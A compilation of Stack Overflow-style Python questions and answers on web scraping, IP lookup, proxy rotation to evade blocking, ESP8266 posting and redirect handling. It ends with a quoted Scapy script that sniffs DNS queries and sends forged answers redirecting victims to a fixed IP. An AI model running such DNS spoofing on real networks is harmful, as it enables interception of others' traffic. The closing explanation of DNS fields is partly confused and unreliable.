import requests
from bs4 import BeautifulSoup
url = "http://www.whatsmyip.org"
for x in range(0,5):
response = requests.get(url).content
soup = BeautifulSoup(response,'lxml')
result = soup.findAll('h1')
for each in result:
print each.text
break
Output:
Your IP Address is 19.12.86.57
Your IP Address is 151.138.87.69
Your IP Address is 108.206.165.11
Your IP Address is 148.84.71.226
Your IP Address is 50.201.205.131
When I run this code, I get a dynamic IP every time and not my public IP. Can anyone explain?
I think its not about python, but about whatsmyip.org ;) Some method probably in which they detect and try to prevent scripting.
Tried some other website and always got my public IP. Example:
url = "https://www.iplocation.net"
for x in range(0,5):
response = requests.get(url).content
soup = BeautifulSoup(response, 'html.parser')
result = soup.findAll('span')
for each in result:
try:
if each.text[0] in '01234567890':
print(each.text)
break
except:
continue
Related
Link of the website: https://awg.wd3.myworkdayjobs.com/AW/job/Lincoln/Business-Analyst_R15025-2
how to get the location, job type , salary details from the website.
Can you please help me in locating the above mentioned details in the HTML code using Beautifulsoup.
html code
The site uses a backend api to deliver the info, if you look at your browser's Developer Tools - Network - fetch/XHR and refresh the page you'll see the data load via json in a request with a similar url to the one you posted.
So if we edit your URL to be the same as the backend api url then we can hit it and parse the JSON. Unfortunately the pay amount is buried in some HTML within the JSON so we have to get it out with BeautifulSoup and a bit of regex to match the £###,### pattern.
import requests
from bs4 import BeautifulSoup
import re
url = 'https://awg.wd3.myworkdayjobs.com/AW/job/Lincoln/Business-Analyst_R15025-2'
search = 'https://awg.wd3.myworkdayjobs.com/wday/cxs/awg/AW/'+url.split('AW')[-1] #api endpoint from Developer Tools
data = requests.get(search).json()
posted = data['jobPostingInfo']['startDate']
location = data['jobPostingInfo']['location']
title = data['jobPostingInfo']['title']
desc = data['jobPostingInfo']['jobDescription']
soup = BeautifulSoup(desc,'html.parser')
pay_text = soup.text
sterling = [x[0] for x in re.findall('(\£[0-9]+(\,[0-9]+)?)', pay_text)][0] #get any £###,#### type text
final = {
'title':title,
'posted':posted,
'location':location,
'pay':sterling
}
print(final)
I am using a relatively cookie cutter code to asynchronously request the HTMLs from a few hundred urls that I have scraped with another piece of code. The code works perfectly.
Unfortunately, this is causing my IP to be blocked due to the high number of requests.
My thought is to write some code to grab some proxy IP addresses, place them in a list, and cycle through them randomly as the requests are sent. Assuming I have no problems in creating this list, I am having trouble conceptualising how to splice the random rotation of these proxy IPs into my asychronous request code. This is my code so far.
async def download_file(url):
async with aiohttp.ClientSession() as session:
async with session.get(url) as resp:
content = await resp.read()
return content
async def write_file(n, content):
filename = f'sync_{n}.html'
with open(filename, 'wb') as f:
f.write(content)
async def scrape_task(n, url):
content = await download_file(url)
await write_file(n, content)
async def main():
tasks = []
for n, url in enumerate(open('links.txt').readlines()):
tasks.append(scrape_task(n,url))
await asyncio.wait(tasks)
if __name__ == '__main__':
asyncio.run(main())
I am thinking that I need to put:
conn = aiohttp.TCPConnector(local_addr=(x, 0), loop=loop)
async with aiohttp.ClientSession(connector=conn) as session:
...
as the second and third lines of my code, where x is going to be one of the random IP addresses from a list earlier defined. How would I go about doing this? I am unsure if placing the whole code in a simple synchoronous loop will defeat the purpose of using the asynchronous requests.
If there is a simpler solution to the problem of being blocked from a website for rapid fire requests, that would be very helpful too. Please note I am very new to coding.
I'm trying to send data to Google Forms directly (without and external service like IFTTT) using an esp8266 with micropython. I've already used IFTTT but at this point is not useful for me, i need a sampling rate of more or equal to 100 Hz and as you know this exceeds the IFTTT's usage limit. I've tried making a RAM buffer, but i got a error saying that the buffer exceded the RAM size (4 MB) so that's why im trying to do directly.
After trying some time i got it partially. I say "partially" because i have to do a random get-request after the post-request; i don't know why it works, but it works (in this way i can send data to Google Forms every second approximately, or maybe less). I guess the problem is that the esp8266 can't close the connection with Google Forms and it gets stuck when it tries to do a new post-request, if this were the problem, i don't know how to fix it in another way, any suggestions? The complete code is here:
ssid = 'my_network'
password = 'my_password'
import urequests
def do_connect():
import network
sta_if = network.WLAN(network.STA_IF)
if not sta_if.isconnected():
print('connecting to network...')
sta_if.active(True)
sta_if.connect(ssid, password)
while not sta_if.isconnected():
pass
print('network config:', sta_if.ifconfig())
def main():
do_connect()
print ("CONNECTED")
url = 'url_of_my_google_form'
form_data = 'entry.61639300=example' #have to change the entry
user_agent = {'Content-Type': 'application/x-www-form-urlencoded'}
while True:
response = urequests.post(url, data=form_data, headers=user_agent)
print ("DATA HAVE BEEN SENT")
response.close
print("TRYING TO SEND ANOTHER ONE...")
response = urequests.get("http://micropython.org/ks/test.html") #<------ RANDOM URL, I DON'T KNOW WHY THIS CODE WORKS CORRECTLY IN THIS WAY
print("RANDOM GET:")
print(response.text)
response.close
if __name__ == '__main__':
main()
Thank you for your time guys. Also i've tried with this code before but it DOESN'T WORK. Without the random get-request, it gets stuck after one or two times of posting:
while True:
response = urequests.post(url, data=form_data, headers=user_agent)
print ("DATA HAVE BEEN SENT")
response.close
print("TRYING TO SEND ANOTHER ONE...")
Shouldn't it be response.close() (with brackets)?.. 🤔,
Without brackets you access a (non existing) property close of the object response instead of calling the method close(), and do not really close the connection. This could lead to memory overflow.
I am trying to use python to find the final redirected URL for a url. I tried various solutions from stackoverflow answers but nothing worked for me. I am only getting the original url.
To be specific, I tried requests, urllib2 and urlparse libraries and none of them worked as they should. Here are some of the codes I tried:
Solution 1:
s = requests.session()
r = s.post('https://www.boots.com/search/10055096', allow_redirects=True)
print(r.history)
print(r.history[1].url)
Result:
[<Response [301]>, <Response [302]>]
https://www.boots.com/search/10055096
Solution 2:
import urlparse
url = 'https://www.boots.com/search/10055096'
try:
out = urlparse.parse_qs(urlparse.urlparse(url).query)['out'][0]
print(out)
except Exception as e:
print('not found')
Result:
not found
Solution 3:
import urllib2
def get_redirected_url(url):
opener = urllib2.build_opener(urllib2.HTTPRedirectHandler)
request = opener.open(url)
return request.url
print(get_redirected_url('https://www.boots.com/search/10055096'))
Result:
HTTPError: HTTP Error 302: The HTTP server returned a redirect error that would lead to an infinite loop.
The last 30x error message was:
Found
Expected URL below is the final redirected page and that is what I want to return.
Original URL: https://www.boots.com/search/10055096
Expected URL: https://www.boots.com/gillette-fusion5-razor-blades-4pk-10055096
Solution #1 was the closest one. At least it returned 2 responses but second respond wasn't the final page, it seems like it was the loading page looking at the content of it.
The first request returns with a html file which contains a JS to update the site and Java scripts are not processed by requests . You can find the updated link by using
import requests
from bs4 import BeautifulSoup
import re
r = requests.get('https://www.boots.com/search/10055096')
soup = BeautifulSoup(r.content,'html.parser')
reg = soup.find('input',id='searchBoxText').findNext('script').contents[0]
print(re.search(r'ht[\w\://\.-]+', reg).group())
I know the structure of a resource record section, which kind of looks like this: enter image description here
But I'm completely lost when reading the source code of a dns spoof plugin:
from scapy.all import *
def dns_spoof(pkt):
redirect_to = '172.16.1.63'
if pkt.haslayer(DNSQR): # DNS question record
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa = 1, qr=1, \
an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=redirect_to))
send(spoofed_pkt)
print 'Sent:', spoofed_pkt.summary()
sniff(filter='udp port 53', iface='wlan0', store=0, prn=dns_spoof)
what are the differences between the QD and AN RRs and why do we have to use QD in this packet?
DNS qr should be interpreted as the query data sent by the client. Scapy uses the DNSQR field to represent this structure. Thus, it's easier to separate the qr section with the other RR fields.